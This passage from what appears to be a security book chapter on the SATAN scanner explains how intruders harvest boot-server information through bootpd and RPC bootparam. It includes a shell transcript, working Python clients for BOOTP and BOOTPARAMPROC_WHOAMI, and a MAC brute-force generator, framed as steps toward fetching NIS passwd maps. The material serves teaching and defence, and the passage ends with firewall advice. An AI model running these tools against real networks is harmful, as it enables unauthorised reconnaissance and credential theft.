Boot Information
If SATAN discovers that a system's portmap program offers the bootparam service, SATAN queries that service and learns the NIS domain name. SATAN focuses on the first phase of a network attack, gaining remote access, and does not try to interrogate the bootpd server; the bootpd server, however, offers an intruder an excellent way to carry out phase three of an attack. Once an intruder has gained root access to a system, the intruder can exploit the weaknesses of bootpd. SATAN lists the systems running bootpd, and a patient intruder will attack those systems once he or she has gained access to any system on the same LAN segment.
After the hacker has gained access to a system on the same LAN segment as the bootpd server, the hacker can learn the hardware (LAN) address of the target by first pinging it. The ping causes the compromised system to send an ARP request, and the target answers with a reply carrying its hardware address. The hacker then dumps the ARP cache of the compromised system. This only works from the same LAN segment; from anywhere else the cached entry is merely the hardware address of the nearest router. Once again, SATAN is useful in the first phase of an attack, gaining initial access to a remote system. This discussion of bootpd concerns the third phase, extending access through additional vulnerabilities, in this case ones available only to systems on the same LAN.
Of course, a hacker on the same LAN segment can also spoof ARP and impersonate hosts, a major vulnerability in its own right. A more realistic attack might therefore brute-force its way through the possible LAN addresses. The first three octets of an Ethernet address are assigned to the manufacturer and are publicly listed; the last three vary by interface, giving 256×256×256 = 16,777,216 (2^24) combinations per vendor prefix. A real attack could generate 16 million bootpc request packets; the attacker might start on a Friday evening and let it run until it gets lucky. Some intelligent sequencing may even be possible: a hacker could map the pattern of a vendor's LAN address assignments against model and shipment date, and use previously gathered information to narrow the search space.
Assuming the hacker obtains the LAN address, the hacker can now retrieve the information about the boot file that the bootpd (or DHCP) server offers to boot clients. (Note that some Unix systems, notably Sun's, use the RPC bootparam method rather than a bootpd server to provide this information.) Here is an example of using ping from the same LAN to grab the LAN address and then querying the boot server:
% ping sys4.notreal.com
PING sys4.notreal.com: 64 byte packets
64 bytes from 12.3.45.67: icmp_seq=0. time=2. ms
% arp -a
sys4.notreal.com (12.3.45.67) at 8:0:9:01:23:45 ether
% bootpquery 080009012345
Received BOOTREPLY from m4.notreal.com (12.3.45.78)
Hardware Address:       08:00:09:01:23:45
Hardware Type:          ethernet
IP Address:             12.3.45.67
Boot file:              /usr/lib/uxbootlf.700

RFC 1048 Vendor Information:
    Subnet Mask:            255.255.248.0
    Gateway:                12.3.45.6
    Domain Name Server:     12.3.4.56
    Host Name:              sys4
%
The bootpquery program is a simple HP-UX utility that sends a bootp request and formats the reply. A comparable program is easy enough to write for other Unix systems.
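As an added illustration of the two preceding points, not code from the book or from HP-UX's bootpquery, the following Python program builds an RFC 951 BOOTREQUEST for a chosen hardware address, decodes the BOOTREPLY together with the RFC 1048 vendor options that bootpquery prints, and includes the generator a brute-force search over a vendor's 2^24 interface addresses would drive. The host names, addresses and boot file in the sample reply are the chapter's fictitious ones; the reply itself is constructed here so the parser can be exercised offline. Sending a real request (query) has to be done from the server's LAN segment and needs root to bind 68/UDP.

```python
"""Added example: a minimal BOOTP client.  Builds a BOOTREQUEST (RFC 951),
decodes a BOOTREPLY with its RFC 1048 vendor options, and enumerates the
2**24 addresses behind one vendor prefix.  The sample reply is constructed
here with the chapter's fictitious names and addresses."""
import socket
import struct

BOOTREQUEST, BOOTREPLY = 1, 2
HTYPE_ETHERNET = 1
RFC1048_MAGIC = bytes([99, 130, 83, 99])
# RFC 1048 vendor tags: subnet mask, gateway, domain name server, host name, end
OPT_SUBNET, OPT_GATEWAY, OPT_DNS, OPT_HOSTNAME, OPT_END = 1, 3, 6, 12, 255
ADDR_OPTS = {OPT_SUBNET: "subnet_mask", OPT_GATEWAY: "gateway", OPT_DNS: "dns"}
HDR = "!BBBBIHH4s4s4s4s16s64s128s"   # the fixed 236-byte BOOTP header


def build_request(mac: bytes, xid: int = 0x1234) -> bytes:
    """BOOTREQUEST for client hardware address `mac`.  All IP fields are zero,
    like a diskless client that knows nothing yet; the server fills them in."""
    if len(mac) != 6:
        raise ValueError("expected a 6-byte Ethernet address")
    zero4 = b"\0" * 4
    head = struct.pack(HDR, BOOTREQUEST, HTYPE_ETHERNET, 6, 0, xid, 0, 0,
                       zero4, zero4, zero4, zero4, mac.ljust(16, b"\0"),
                       b"\0" * 64, b"\0" * 128)
    # 64-byte vendor area: magic cookie, END tag, zero padding -> 300 bytes total
    return (head + RFC1048_MAGIC + bytes([OPT_END])).ljust(300, b"\0")


def parse_rfc1048(opts: bytes) -> dict:
    """Walk the tag/length/value list; tag 0 (pad) and 255 (end) have no length."""
    out, i = {}, 0
    while i < len(opts) and opts[i] != OPT_END:
        tag = opts[i]
        if tag == 0:
            i += 1
            continue
        if i + 1 >= len(opts):      # truncated option: stop rather than IndexError
            break
        length = opts[i + 1]
        val = opts[i + 2:i + 2 + length]
        i += 2 + length
        if tag in ADDR_OPTS and len(val) >= 4:
            out[ADDR_OPTS[tag]] = socket.inet_ntoa(val[:4])   # first address only
        elif tag == OPT_HOSTNAME:
            out["host_name"] = val.decode(errors="replace")
    return out


def parse_reply(pkt: bytes) -> dict:
    """Decode a BOOTREPLY into the fields bootpquery displays."""
    if len(pkt) < 236:
        raise ValueError("short BOOTP packet")
    (op, htype, hlen, _hops, xid, _secs, _flags, ciaddr, yiaddr, siaddr,
     _giaddr, chaddr, sname, bfile) = struct.unpack(HDR, pkt[:236])
    if op != BOOTREPLY:
        raise ValueError(f"not a BOOTREPLY (op={op})")
    res = {
        "xid": xid,
        "hw_address": ":".join(f"{b:02x}" for b in chaddr[:hlen]),
        "hw_type": "ethernet" if htype == HTYPE_ETHERNET else str(htype),
        # yiaddr is the address the server hands out; fall back to ciaddr
        "ip_address": socket.inet_ntoa(yiaddr if yiaddr.strip(b"\0") else ciaddr),
        "server_ip": socket.inet_ntoa(siaddr),
        "server_name": sname.split(b"\0", 1)[0].decode(errors="replace"),
        "boot_file": bfile.split(b"\0", 1)[0].decode(errors="replace"),
    }
    vend = pkt[236:]
    if vend[:4] == RFC1048_MAGIC:
        res.update(parse_rfc1048(vend[4:]))
    return res


def mac_range(oui: bytes):
    """Every MAC behind vendor prefix `oui`: the 2**24 = 16,777,216 candidates
    a brute-force search would have to send BOOTREQUESTs for."""
    for n in range(1 << 24):
        yield oui + n.to_bytes(3, "big")


def query(mac: bytes, server: str = "255.255.255.255", timeout: float = 2.0) -> dict:
    """Send one request and decode the first reply (same LAN segment, root)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.bind(("", 68))
        s.settimeout(timeout)
        s.sendto(build_request(mac), (server, 67))
        data, _ = s.recvfrom(1024)
    return parse_reply(data)


def sample_reply() -> bytes:
    """Constructed BOOTREPLY mirroring the chapter's bootpquery transcript."""
    vendor = (RFC1048_MAGIC
              + bytes([OPT_SUBNET, 4]) + socket.inet_aton("255.255.248.0")
              + bytes([OPT_GATEWAY, 4]) + socket.inet_aton("12.3.45.6")
              + bytes([OPT_DNS, 4]) + socket.inet_aton("12.3.4.56")
              + bytes([OPT_HOSTNAME, 4]) + b"sys4" + bytes([OPT_END]))
    head = struct.pack(HDR, BOOTREPLY, HTYPE_ETHERNET, 6, 0, 0x1234, 0, 0,
                       b"\0" * 4, socket.inet_aton("12.3.45.67"),
                       socket.inet_aton("12.3.45.78"), b"\0" * 4,
                       bytes.fromhex("080009012345").ljust(16, b"\0"),
                       b"m4.notreal.com".ljust(64, b"\0"),
                       b"/usr/lib/uxbootlf.700".ljust(128, b"\0"))
    return (head + vendor).ljust(300, b"\0")
```

Running `parse_reply(sample_reply())` yields the same fields the bootpquery transcript shows; `query(bytes.fromhex("080009012345"))` performs the live exchange. A brute-force run is `for mac in mac_range(bytes.fromhex("080009")): query(mac)`, which makes concrete why the text estimates a weekend for it.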
The information returned by bootpd is quite useful. The bootp packets contain IP and hostname information about systems that boot their kernels over a network connection to a server. The bootp packets also indicate a boot server system that supplies boot files and boot configuration information to client systems that boot over the network. An intruder can try to corrupt boot data on the server or try to masquerade as a boot server to the client.
If the remote systems are using the rpc bootparam method instead of the bootpd method, the hacker can get the information via the portmap program on the systems that showed bootparam on the rpcinfo -p list.
By crafting an rpc program that does a callrpc() for BOOTPARAMPROC_WHOAMI, the hacker can get the same information, as well as the NIS domain of the systems, which can then be used to request NIS maps, such as passwd, from the ypserv program. A program called bootparam that gets such information is included as part of SATAN.
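The following Python program is an added example of the callrpc() approach just described; it is not SATAN's bootparam program, and it builds the ONC RPC messages by hand rather than through an RPC library. It asks portmap (program 100000) for the UDP port of bootparamd (program 100026), then calls BOOTPARAMPROC_WHOAMI for a client address the server knows, and decodes the client name, NIS domain and router from the reply. Program, version and procedure numbers and the argument layout follow the rpc and bootparam_prot.x definitions; the sample reply is constructed here with the chapter's fictitious names so the decoder can be tested offline.

```python
"""Added example, not SATAN's bootparam program: a hand-rolled ONC RPC client
that asks portmap where bootparamd listens and then calls BOOTPARAMPROC_WHOAMI,
which returns the client's name, its NIS domain and its router.  Numbers follow
rpc(4) and bootparam_prot.x; the sample reply is constructed for the test."""
import os
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
BOOTPARAM_PROG, BOOTPARAM_VERS, BOOTPARAMPROC_WHOAMI = 100026, 1, 1
IPPROTO_UDP, IP_ADDR_TYPE = 17, 1
CALL, REPLY, MSG_ACCEPTED, SUCCESS = 0, 1, 0, 0


def xdr_string(s: bytes) -> bytes:
    """XDR string: 4-byte length, data, zero padding to a multiple of 4."""
    return struct.pack("!I", len(s)) + s + b"\0" * (-len(s) % 4)


def xdr_read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from("!I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n + (-n % 4)


def rpc_call(xid: int, prog: int, vers: int, proc: int, args: bytes) -> bytes:
    """RPC v2 CALL header; cred and verf are AUTH_NULL (flavor 0, length 0)."""
    return struct.pack("!10I", xid, CALL, 2, prog, vers, proc, 0, 0, 0, 0) + args


def rpc_result(reply: bytes, xid: int) -> bytes:
    """Check a REPLY header and return the XDR-encoded result that follows it."""
    rxid, mtype, stat = struct.unpack_from("!3I", reply, 0)
    if rxid != xid or mtype != REPLY or stat != MSG_ACCEPTED:
        raise ValueError("RPC reply rejected or xid mismatch")
    _flavor, vlen = struct.unpack_from("!2I", reply, 12)    # reply verifier
    off = 20 + vlen + (-vlen % 4)
    (astat,) = struct.unpack_from("!I", reply, off)
    if astat != SUCCESS:
        raise ValueError(f"accept_stat {astat}")
    return reply[off + 4:]


def getport_args() -> bytes:
    """PMAPPROC_GETPORT mapping: prog, vers, prot, port (port is ignored)."""
    return struct.pack("!4I", BOOTPARAM_PROG, BOOTPARAM_VERS, IPPROTO_UDP, 0)


def whoami_args(client_ip: str) -> bytes:
    """bp_whoami_arg: union bp_address {IP_ADDR_TYPE; ip_addr_t}, where the
    four `char` octets of ip_addr_t are each XDR-encoded as a 4-byte int."""
    return struct.pack("!5I", IP_ADDR_TYPE, *socket.inet_aton(client_ip))


def parse_whoami_res(body: bytes) -> dict:
    """bp_whoami_res: client_name, domain_name, router_address."""
    name, off = xdr_read_string(body, 0)
    domain, off = xdr_read_string(body, off)
    atype, *octets = struct.unpack_from("!5i", body, off)
    if atype != IP_ADDR_TYPE:
        raise ValueError(f"unexpected address type {atype}")
    # a peer with signed char sends octets above 127 as negative ints; mask them
    router = ".".join(str(o & 0xff) for o in octets)
    return {"client_name": name.decode(), "nis_domain": domain.decode(),
            "router": router}


def udp_rpc(host: str, port: int, prog: int, vers: int, proc: int,
            args: bytes) -> bytes:
    xid = int.from_bytes(os.urandom(4), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(3.0)
        s.sendto(rpc_call(xid, prog, vers, proc, args), (host, port))
        data, _ = s.recvfrom(4096)
    return rpc_result(data, xid)


def bootparam_whoami(host: str, client_ip: str) -> dict:
    """The two-step the text describes: portmap on 111/UDP gives bootparamd's
    port, then WHOAMI for `client_ip` (any boot client the server knows)."""
    (port,) = struct.unpack_from("!I", udp_rpc(host, 111, PMAP_PROG, PMAP_VERS,
                                               PMAPPROC_GETPORT, getport_args()))
    if port == 0:
        raise RuntimeError("bootparam not registered with portmap")
    body = udp_rpc(host, port, BOOTPARAM_PROG, BOOTPARAM_VERS,
                   BOOTPARAMPROC_WHOAMI, whoami_args(client_ip))
    return parse_whoami_res(body)


def sample_reply(xid: int) -> bytes:
    """Constructed successful REPLY: sys4, NIS domain notreal, router 12.3.45.6."""
    hdr = struct.pack("!6I", xid, REPLY, MSG_ACCEPTED, 0, 0, SUCCESS)
    return hdr + xdr_string(b"sys4") + xdr_string(b"notreal") + struct.pack(
        "!5i", IP_ADDR_TYPE, 12, 3, 45, 6)
```

Against a live server, `bootparam_whoami("m4.notreal.com", "12.3.45.67")` returns the dictionary with the NIS domain that a subsequent ypserv request for the passwd map would need. Because the client supplies an arbitrary address and no credentials (AUTH_NULL), the server answers anyone who can reach it, which is the point the text makes about this service.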
Tip: A system administrator should never expose a boot server to the Internet. Firewalls should be configured to screen out packets to the bootp ports (67/UDP and 68/UDP, plus 1067/UDP and 1068/UDP) and the portmap ports (111/UDP and 111/TCP). Blocking portmap only hides the lookup, however: bootparamd and other RPC services listen on dynamically assigned ports that an intruder can find by scanning, so the filter should block the services themselves and not just the portmapper.
finger, rusers, and rwho
Some consider the finger program to be one of the most dangerous tools for information leakage. Although it provides useful information for monitoring remote hosts, it provides even more useful information for hackers who are trying to build up databases of information about the target systems. A comparable rpc program, rusers, is frequently available even when fingerd is not. A third program, rwho, also provides similar information.